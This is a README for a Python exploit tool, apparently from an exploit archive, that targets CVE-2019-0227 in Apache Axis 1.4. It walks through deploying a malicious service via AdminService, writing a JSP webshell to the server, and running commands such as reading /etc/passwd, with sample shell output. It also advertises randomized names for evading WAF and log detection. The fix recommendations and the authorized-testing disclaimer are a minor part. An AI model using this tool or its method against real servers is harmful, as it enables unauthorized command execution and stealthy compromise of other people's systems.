## https://sploitus.com/exploit?id=371B14AC-8018-52E8-89C5-302C7B59C44F
# Axis1.4 CVE-2019-0227 Remote Command Execution Vulnerability Exploitation Tool
A Python tool for exploiting the remote command execution vulnerability (CVE-2019-0227) in Apache Axis1.4. Supports **randomizing service names and Webshell filenames**, automated deployment, and interactive command execution. ## π Vulnerability Description
There is a remote command execution vulnerability (CVE-2019-0227) in Apache Axis1.4. When the `enableRemoteAdmin` property is set to `true`, attackers can deploy malicious WebServices through the `AdminService` interface. Combined with the `LogHandler`, this allows writing the Webshell, enabling arbitrary system commands to be executed on the target server. **Affected versions**: Apache Axis β€ 1.4
**Trigger condition**: `enableRemoteAdmin` set to `true`
## β¨ Features
- π **Automated deployment**: Deploys malicious services and writes Webshells with one click
- π² **Random naming**: Generates random service names and Webshell filenames each time it runs
- π» **Interactive Shell**: Supports executing multiple commands consecutively
- π§ **Basic authentication**: Supports targets configured with `adminPassword`
- π― **Pure Python**: Low-footprint, easy to use
- π‘οΈ **Kill-avoidance**: Randomized names can bypass simple static detection rules
## π οΈ Installation and Dependencies
### Environment Requirements
- Python 3.7+
- requests library
### Install Dependencies
```bash
pip install requests urllib3
```
## π Quick Start
### Basic Usage
```bash
# Upload only the Webshell (automatically generates random service names and filenames)
python3 axis_exp.py -u http://target.com:8080/axis/
# Execute a single command
python3 axis_exp.py -u http://target.com:8080/axis/ -c "whoami"
# Interactive Shell mode
python3 axis_exp.py -u http://target.com:8080/axis/ -i
```
### Authentication Usage
If the target is configured with `adminPassword`, you need to add the authentication parameter:
```bash
# Single command with authentication
python3 axis_exp.py -u http://target.com:8080/axis/ -U admin -P admin -c "id"
# Interactive Shell with authentication
python3 axis_exp.py -u http://target.com:8080/axis/ -U admin -P admin -i
```
## π§ Vulnerability Exploitation Process
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 1: Deploy malicious services through AdminService β
β POST /axis/services/AdminService β
β β Create RandomService (RandomLog triggered per request) β
β β Create RandomLog Handler (Write to ../webapps/ROOT/shell.jsp) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 2: Trigger RandomService to write the Webshell β
β POST /axis/services/RandomService β
β β RandomLog Handler is triggered β
β β Write the JSP code in the request to shell.jsp β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 3: Access the Webshell to execute commands β
β GET /shell.jsp?c=whoami β
β β The server executes `whoami` and returns a result β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
1. **Random naming**: Generates random service names (8 characters) and Webshell filenames (6 characters) each time it runs.
2. **Deploy malicious services**: Uses `AdminService` to deploy malicious services, with the LogHandler configured to write to the specified file.
3. **Write the Webshell**: Triggers the malicious service to write the JSP Webshell code to the target server.
4. **Execute commands**: Accesses the Webshell via a `GET` request, passing in the `cmd` parameter to execute system commands.
## πΈ Example Usage
### Interactive Shell Demonstration
```bash
$ python3 axis_exp.py -u http://192.168.1.100:8080/axis/ -i
```
============================================================
Axis1.4 CVE-2019-0227 Vulnerability Exploitation Tool
Target: http://192.168.1.100:8080/axis
Service Name: x7k2m9pq
Webshell: http://192.168.1.100/x7k2m9.jsp
============================================================
[*] Malicious service deployed: x7k2m9pq
[+] Service deployment successful: x7k2m9pq
[*] Webshell written: x7k2m9.jsp
[+] Webshell writing completed: x7k2m9.jsp
[+] Vulnerability exploited successfully! [+] Webshell URL: http://192.168.1.100/x7k2m9.jsp
[*] Enter the interactive shell (exit by typing 'exit').
x7k2m9$ whoami
www-data
x7k2m9$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
x7k2m9$ pwd
/var/lib/tomcat9/webapps/ROOT
x7k2m9$ uname -a
Linux target 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 x86_64 GNU/Linux
x7k2m9$ exit
[*] Exited
```
### Demonstration of Single Command Execution
```bash
$ python3 axis_exp.py -u http://192.168.1.100:8080/axis/ -c "cat /etc/passwd"
```
============================================================
Axis1.4 CVE-2019-0227 Vulnerability Exploitation Tool
Target: http://192.168.1.100:8080/axis
Service Name: a3f8k2m1
Webshell: http://192.168.1.100/b9d4e2.jsp
============================================================
[*] Malicious service deployed: a3f8k2m1
[+] Service deployment successful: a3f8k2m1
[*] Webshell written: b9d4e2.jsp
[+] Webshell writing completed: b9d4e2.jsp
[+] Vulnerability exploited successfully! [+] Webshell URL: http://192.168.1.100/b9d4e2.jsp
[*] Executed command: cat /etc/passwd
--------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
--------------------------------------------------
```
### Randomization Feature Demonstration
Each run generates different service names and filenames:
| Number of Runs | Service Name | Webshell File Name |
|--------------|-----------------|-----------------|
| 1st Run | `x7k2m9pq` | `x7k2m9.jsp` |
| 2nd Run | `a3f8k2m1` | `b9d4e2.jsp` |
| 3rd Run | `n5p7r3t8` | `q2w4r6.jsp` |
## β οΈ Notes
1. **Vulnerability exploitation prerequisite**: The `enableRemoteAdmin` property of the target Axis service must be set to `true`.
2. **Authentication issue**: If `adminPassword` is configured for the target, provide the correct username and password using the `-U` and `-P` parameters.
3. **Path issue**: The script defaults to writing the webshell to `../webapps/ROOT/`. You can modify the `LogHandler.fileName` parameter in the `deploy()` method according to actual conditions.
4. **Randomization advantage**: Random service names and filenames can prevent detection by WAF or log monitoring systems.
5. **For authorized testing only**: Do not use this tool without authorization.
## π Vulnerability Fixing Recommendations
1. Set `enableRemoteAdmin` to `false`.
2. Comment out or remove the `AdminServlet`-related configurations.
3. Configure access control to limit the sources of access to `/services/AdminService`.
4. Remove unnecessary example files (such as `StockQuoteService.jws`).
5. Upgrade to a higher version or use another WebService framework.
6. Monitor abnormal `AdminService` requests in the logs.
## π Frequently Asked Questions
### Q: Why does it show an HTTP 401 error? A: The target has configured `adminPassword`. Please use the `-U admin -P password` parameters for authentication. ### Q: Why does it show an HTTP 403 error? A: The target does not have `enableRemoteAdmin` enabled. Check the target configuration. ### Q: The webshell writes successfully, but no output appears? A: Possible reasons:
- No output from the command execution (e.g., `touch /tmp/test`)
- Issues with the target systemβs environment variables (try using the full path, such as `/bin/whoami`)
- JSP compilation errors (check the Tomcat logs)
### Q: How do I change the webshell writing path? A: Edit the `deploy()` method in the script and modify the `LogHandler.fileName` parameter value. ## π Disclaimer
This tool is used solely for security research and authorized testing purposes. Using this tool to attack a target system is illegal. The user shall bear all legal responsibilities. **Do not use it for illegal purposes!**